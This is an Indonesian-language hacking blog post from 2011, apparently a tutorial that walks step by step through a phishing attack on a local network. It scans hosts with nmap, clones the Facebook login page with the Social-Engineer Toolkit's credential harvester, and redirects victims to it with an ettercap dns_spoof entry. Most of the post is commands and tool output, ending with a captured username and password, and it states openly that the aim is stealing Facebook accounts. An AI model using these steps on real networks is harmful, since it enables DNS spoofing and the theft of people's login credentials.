Saturday, November 5, 2011

Phishing dengan SET dan Ettercap-NG

Hallo sobat, beberapa hari yang lalu teman saya red-dragon pernah menjelaskan mengenai prerouting yang dijelaskan di sini untuk melakukan exploitasi. Kali ini teman saya red-dragon akan mencoba memanfaatkan dns_spoof yang terdapat dalam plugin ettercap-ng untuk melakukan phishing.

Hal pertama yang harus dilakukan adalah mengumpulkan informasi. Hal ini pernah teman saya red-dragon jelaskan di sini
Preparation:
  • Ettercap-NG
  • Social Engineering Toolkit
Note:
  • Matikan web server apache dengan menggunakan perintah:
root@bt5r1:~# /etc/init.d/apache2 stop
Walktrough:




root@bt5r1:~# nmap 172.16.129.1/24

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-25 14:17 WIT
Nmap scan report for 172.16.129.1
Host is up (0.0000070s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE
902/tcp open  iss-realsecure

Nmap scan report for 172.16.129.129
Host is up (0.00070s latency).
Not shown: 993 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
554/tcp   open  rtsp
2869/tcp  open  icslap
5357/tcp  open  wsdapi
10243/tcp open  unknown
MAC Address: 00:0C:29:71:E6:CF (VMware)

Nmap scan report for 172.16.129.254
Host is up (0.000066s latency).
All 1000 scanned ports on 172.16.129.254 are filtered
MAC Address: 00:50:56:EE:EB:39 (VMware)

Nmap done: 256 IP addresses (3 hosts up) scanned in 10.88 seconds
Screenshot:
Setelah mengetahui targetnya, maka kita siapkan web phishing-nya dengan menggunakan SET. Berikut modulnya:
root@bt5r1:~# cd /pentest/exploits/set/
root@bt5r1:/pentest/exploits/set# ./set


  [---]       The Social-Engineer Toolkit (SET)          [---]
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]                 Version: 2.1                     [---]
  [---]              Codename: 'Rebirth'                 [---]
  [---]       Report bugs: davek@social-engineer.org     [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]        Homepage: http://www.secmaniac.com        [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.

     Join us on irc.freenode.net in channel #setoolkit

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1

  [---]       The Social-Engineer Toolkit (SET)          [---]
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]                 Version: 2.1                     [---]
  [---]              Codename: 'Rebirth'                 [---]
  [---]       Report bugs: davek@social-engineer.org     [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]        Homepage: http://www.secmaniac.com        [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.

     Join us on irc.freenode.net in channel #setoolkit

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) Third Party Modules

  99) Return back to the main menu.

set> 2

 The Web Attack module is  a unique way of utilizing multiple web-based attacks
 in order to compromise the intended victim.

 The Java Applet Attack method will spoof a Java Certificate and deliver a 
 metasploit based payload. Uses a customized java applet created by Thomas
 Werth to deliver the payload.

 The Metasploit Browser Exploit method will utilize select Metasploit
 browser exploits through an iframe and deliver a Metasploit payload.
[snip...]

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Create or import a CodeSigning Certificate

  99) Return to Main Menu

set:webattack>6

 The first method will allow SET to import a list of pre-defined web 
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2

Setelah ini maka web phishing hampir selesai, yang harus kita lakukan adalah menentukan apa yang ingin kita curi dari korban. Misalkan ingin mencuri akun facebook, maka modulnya seperti berikut:
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.facebook.com

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] I have read the above message. [*]

Press {return} to continue.

[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
Dengan begini web phishing telah siap. Kita hanya tinggal menunggu korban mengklik link di atas yang tercetak warna ungu, yaitu: https://login.facebook.com/login.php atau bisa juga korban harus menuju link kita yaitu: 172.16.129.1. Hmmm, rasanya sulit sekali jika kita harus menunggu korban menuju link itu. Kita gunakan DNS spoof, agar korban selalu menuju IP kita ketika dia akan mengakses www.facebook.com. Modul:
root@bt5r1:~# nano /usr/share/ettercap/etter.dns



Lalu tambahkan baris ini di bawah:
www.facebook.com A 172.16.129.1

Ini akan membuat korban selalu di-spoof ke 172.16.129.1 ketika ingin mengakses www.facebook.com. Setelah itu, lakukan modul ini untuk mengaktifkan dns_spoof:
root@bt5r1:~# ettercap -i vmnet8 -T -q -P dns_spoof // //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on vmnet8... (Ethernet)

vmnet8 -> 00:50:56:C0:00:08      172.16.129.1     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

2 hosts added to the hosts list...
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

Screenshot:
Setelah ini maka persiapan sudah 100%. Kita hanya tinggal menunggu korban mengakses halaman kita. Lihat screenshot ketika Windows tidak spoofed saat mengakses Google:
Dan lihat ketika korban spoofed ketika mengakses www.facebook.com ke halaman phishing SET. Berikut report dari ettercap:
dns_spoof: [www.facebook.com] spoofed to [172.16.129.1]
Screenshot:
Lihat halaman phishing yang dibuat oleh SET yang sama persis dengan yang sebenarnya, hanya saja URL-nya berbeda:
Dan lihat ketika user memasukan Username dan Sandinya:
Report dari SET:
[*] Information will be displayed to you as it arrives below:
172.16.129.129 - - [25/Oct/2011 14:25:12] "GET / HTTP/1.1" 200 -
10.76.80.63 - - [25/Oct/2011 14:26:24] "GET /index2.html HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: charset_test=€,´,€,´,水,Д,Є
PARAM: lsd=
PARAM: return_session=0
PARAM: legacy_return=1
PARAM: display=
PARAM: session_key_only=0
PARAM: trynum=1
PARAM: charset_test=€,´,€,´,水,Д,Є
PARAM: lsd=
POSSIBLE USERNAME FIELD FOUND: email=doubledragon
POSSIBLE PASSWORD FIELD FOUND: pass=doubledragon
PARAM: persistent=1
PARAM: default_persistent=0
POSSIBLE USERNAME FIELD FOUND: login=Masuk
[*] WHEN YOUR FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


^C[*] File exported to reports/2011-10-25 14:28:14.508234.html for your reading pleasure...
[*] File in XML format exported to reports/2011-10-25 14:28:14.508234.xml for your reading pleasure...

Press {return} to return to the menu.

Screenshot:
Sekian tutorial kali ini, semoga bermanfaat =))

Created By red-dragon

No comments:

Template by : mhiman@ hacker-newbie.org